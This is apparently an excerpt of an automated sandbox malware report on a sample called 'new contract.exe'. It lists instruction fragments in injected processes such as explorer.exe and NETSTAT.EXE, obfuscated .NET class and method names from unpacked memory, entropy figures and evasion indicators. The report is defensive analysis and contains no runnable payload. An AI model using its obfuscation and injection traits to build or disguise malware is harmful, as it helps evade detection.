Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_00416A52 push dword ptr [eax]; ret 2_2_00416A63
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_00405262 push ebx; ret 2_2_0040526F
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_004163E0 push ebp; ret 2_2_0041645B
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0040A464 push es; retf 2_2_0040A466
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041D4CB push eax; ret 2_2_0041D532
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041D52C push eax; ret 2_2_0041D532
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041774A push cs; ret 2_2_0041774B
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041AF82 push 00000074h; ret 2_2_0041AF8C
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_015F225F pushad ; ret 2_2_015F27F9
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_015F27FA pushad ; ret 2_2_015F27F9
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016209AD push ecx; mov dword ptr [esp], ecx 2_2_016209B6
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_015F283D push eax; iretd 2_2_015F2858
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_015F1365 push eax; iretd 2_2_015F1369
Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E6B02 push esp; retn 0000h 3_2_0E4E6B03
Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E6B1E push esp; retn 0000h 3_2_0E4E6B1F
Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E69B5 push esp; retn 0000h 3_2_0E4E6AE7
Source: C:\Windows\explorer.exe | Code function: 3_2_0FB45B1E push esp; retn 0000h 3_2_0FB45B1F
Source: C:\Windows\explorer.exe | Code function: 3_2_0FB45B02 push esp; retn 0000h 3_2_0FB45B03
Source: C:\Windows\explorer.exe | Code function: 3_2_0FB459B5 push esp; retn 0000h 3_2_0FB45AE7
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_006860DD push ecx; ret 5_2_006860F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031409AD push ecx; mov dword ptr [esp], ecx 5_2_031409B6
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0052703B push ebx; retf 5_2_0052703C
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00515262 push ebx; ret 5_2_0051526F
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_005263E0 push ebp; ret 5_2_0052645B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0052D475 push eax; ret 5_2_0052D4C8
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0051A464 push es; retf 5_2_0051A466
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0052D4C2 push eax; ret 5_2_0052D4C8
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0052D4CB push eax; ret 5_2_0052D532
Source: new contract.exe | Static PE information: section name: .text entropy: 7.83819492389617
Source: 0.2.new contract.exe.419def0.2.raw.unpack, SOwVvHMwinIr4CVPeB.cs | High entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, uf9aokYYeocPIOSosy.cs | High entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, QQTpKp75Qv0RWvQaoE.cs | High entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BdAaLxlyFpvWDFdhFt.cs | High entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs | High entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, zEP9MvkRynobcNIcT7.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, nBjC5FWVGlwu26wPqR.cs | High entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, AnPH1ZOKvPImGHJVl0j.cs | High entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fwA2K7BTejKMW9QUlG.cs | High entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, FgGUaas92i9EvJTkCy.cs | High entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, OZjAZMZljeJfRcMEoc.cs | High entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, cxtTtGunxt5IjcA9tT.cs | High entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, p7xNqEzxIiFeSoxNuY.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fgEBeMUyhH7sZUUckO.cs | High entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, zUws5HLCWDAIg0bvex.cs | High entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, nNEK9grHOYMabirkn9.cs | High entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fbgZAVOvkt4qOAMZfXo.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, UCFEImOOnS2ah0fT7nc.cs | High entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, J7QEFHaSxHRZs0TFi6.cs | High entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, aDjYvCEF62E4IZYMPn.cs | High entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, y5AhBBpbkCOrjXLQSY.cs | High entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, SQA3X2yg9UeEuDdc7y.cs | High entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, el3wNP0WoRTZbNZSWq.cs | High entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, SOwVvHMwinIr4CVPeB.cs | High entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, uf9aokYYeocPIOSosy.cs | High entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, QQTpKp75Qv0RWvQaoE.cs | High entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BdAaLxlyFpvWDFdhFt.cs | High entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs | High entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, zEP9MvkRynobcNIcT7.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, nBjC5FWVGlwu26wPqR.cs | High entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, AnPH1ZOKvPImGHJVl0j.cs | High entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fwA2K7BTejKMW9QUlG.cs | High entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, FgGUaas92i9EvJTkCy.cs | High entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, OZjAZMZljeJfRcMEoc.cs | High entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, cxtTtGunxt5IjcA9tT.cs | High entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, p7xNqEzxIiFeSoxNuY.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fgEBeMUyhH7sZUUckO.cs | High entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, zUws5HLCWDAIg0bvex.cs | High entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, nNEK9grHOYMabirkn9.cs | High entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fbgZAVOvkt4qOAMZfXo.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, UCFEImOOnS2ah0fT7nc.cs | High entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, J7QEFHaSxHRZs0TFi6.cs | High entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, aDjYvCEF62E4IZYMPn.cs | High entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, y5AhBBpbkCOrjXLQSY.cs | High entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, SQA3X2yg9UeEuDdc7y.csHigh entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, el3wNP0WoRTZbNZSWq.csHigh entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, SOwVvHMwinIr4CVPeB.csHigh entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, uf9aokYYeocPIOSosy.csHigh entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, QQTpKp75Qv0RWvQaoE.csHigh entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BdAaLxlyFpvWDFdhFt.csHigh entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.csHigh entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, zEP9MvkRynobcNIcT7.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, nBjC5FWVGlwu26wPqR.csHigh entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, AnPH1ZOKvPImGHJVl0j.csHigh entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fwA2K7BTejKMW9QUlG.csHigh entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, FgGUaas92i9EvJTkCy.csHigh entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, OZjAZMZljeJfRcMEoc.csHigh entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, cxtTtGunxt5IjcA9tT.csHigh entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, p7xNqEzxIiFeSoxNuY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fgEBeMUyhH7sZUUckO.csHigh entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, zUws5HLCWDAIg0bvex.csHigh entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, nNEK9grHOYMabirkn9.csHigh entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fbgZAVOvkt4qOAMZfXo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, UCFEImOOnS2ah0fT7nc.csHigh entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, J7QEFHaSxHRZs0TFi6.csHigh entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, aDjYvCEF62E4IZYMPn.csHigh entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, y5AhBBpbkCOrjXLQSY.csHigh entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, SQA3X2yg9UeEuDdc7y.csHigh entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, el3wNP0WoRTZbNZSWq.csHigh entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
          Source: C:\Users\user\Desktop\new contract.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match | File source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTR
          Source: C:\Users\user\Desktop\new contract.exe | API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Users\user\Desktop\new contract.exe | API/Special instruction interceptor: Address: 7FFE22210774
